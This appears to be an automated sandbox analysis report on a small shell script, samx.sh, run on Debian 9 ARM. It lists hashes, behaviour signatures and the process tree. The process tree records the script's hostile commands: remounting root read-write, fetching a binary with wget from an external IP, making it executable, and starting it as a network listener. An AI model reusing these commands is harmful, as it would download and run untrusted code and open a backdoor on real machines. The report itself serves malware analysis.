Analysis

  • max time kernel
    1030s
  • max time network
    132s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20221111-en
  • resource tags

    arch:armhf
    image:debian9-armhf-20221111-en
    kernel:4.9.0-13-armmp-lpae
    locale:en-us
    os:debian-9-armhf
    system
  • submitted
    23-11-2022 15:40

General

  • Target

    samx.sh

  • Size

    400B

  • MD5

    6039cf7d6cc1378682e1a983fcaba7a8

  • SHA1

    3ca4e29546ca125fd98429768ae0fd44182ccdee

  • SHA256

    af2bc5dda7b0ae47a3ccd286afa17718b4e81daf944a8784e445e597dbbdcd28

  • SHA512

    4119e1787b6edcc2639f0266308aea50891e67ea23404a060dd46bea082bc26033d8aafb93c06c084c391e141f838eacf21433cf94aabf1bf1e7b8e393504253

Score
8/10

Malware Config

Signatures

  • Modifies hosts file (1 IoC)

    Adds to hosts file used for mapping hosts to IP addresses.

  • Writes DNS configuration (1 TTP, 2 IoCs)

    Writes data to DNS resolver config file.

  • Reads runtime system information (3 IoCs)

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory (2 IoCs)

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/samx.sh
    /tmp/samx.sh
    • Writes file to tmp directory
    PID:374
    • /bin/sleep
      sleep 120
      PID:375
    • /bin/mount
      mount -no "remount,rw" /
      • Reads runtime system information
      PID:402
    • /bin/ping
      ping -c 4 samx-.subdomain.llzxs.com
      • Modifies hosts file
      • Writes DNS configuration
      PID:410
    • /usr/bin/wget
      wget -P /tmp/ http://185.135.73.148:800/ss-server
      • Writes file to tmp directory
      PID:411
    • /bin/sleep
      sleep 10
      PID:445
    • /bin/chmod
      chmod +x /tmp/ss-server
      PID:515
  • /bin/sed
    sed "s/ /-/g"
    • Reads runtime system information
    PID:405
  • /bin/grep
    grep "inet addr"
    PID:408
  • /bin/sed
    sed -r "s/ +inet addr:([0-9.]+) .+/\\1/g"
    • Reads runtime system information
    PID:409
  • /tmp/ss-server
    /tmp/ss-server -s 0.0.0.0 -p 8300 -m aes-256-cfb -k 123456
    • Writes DNS configuration
    PID:517

Network

MITRE ATT&CK Enterprise v6


Downloads